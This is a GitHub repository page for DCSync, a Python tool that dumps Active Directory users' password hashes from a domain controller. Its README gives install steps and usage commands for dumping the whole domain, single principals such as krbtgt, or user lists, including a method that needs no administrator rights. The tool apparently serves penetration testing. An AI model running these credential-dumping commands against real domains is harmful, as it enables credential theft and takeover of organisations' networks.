Skip to content
/ DCSync Public

DCSync is a python script for dumping domain users secrets

License

GPL-3.0 license
4 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

AetherBlack/DCSync

BranchesTags

Repository files navigation

 ┓       
┏┫┏┏┓┏┏┓┏
┗┻┗┛┗┫┛┗┗
     ┛

A python script for dumping domain users secrets using DCSync method.
PyPI GitHub release (latest by date)

Installation

You can install it from pypi (latest version is PyPI) with this command:

sudo python3 -m pip install dcsync

OR from source :

git clone https://github.com/AetherBlack/DCSync
cd DCSync
python3 -m venv .
source bin/activate
python3 -m pip install .

OR with pipx :

python3 -m pipx install git+https://github.com/AetherBlack/DCSync/

Examples

  • You want to DCSync the whole domain with Administrator privilegies :
dcsync $DOMAIN/$USER:"$PASSWORD"@$DC

  • You want to DCSync for a single principal :
dcsync -just-user krbtgt -k $DOMAIN/$USER:"$PASSWORD"@$DC

  • You want to DCSync the whole domain without Administrator privilegies using ldap method :
dcsync -method ldap $DOMAIN/$USER:"$PASSWORD"@$DC

You can use this methods :

samr (Default)
ldap
file
  • You want to DCSync only a list of specific principals :
dcsync -just-user-file ./usersfile.txt $DOMAIN/$USER:"$PASSWORD"@$DC

How it works

The tool will use the provided method to enumerate the users of the domain. Then, it will connect to the DC's RPC to dump their NT hash, LM hash, AES hash and history hash.

Credits

License

GNU General Public License v3.0

About

DCSync is a python script for dumping domain users secrets

Resources

Readme

License

GPL-3.0 license
Activity

Stars

4 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases 1

First release Latest
Dec 19, 2024

Packages

No packages published

Languages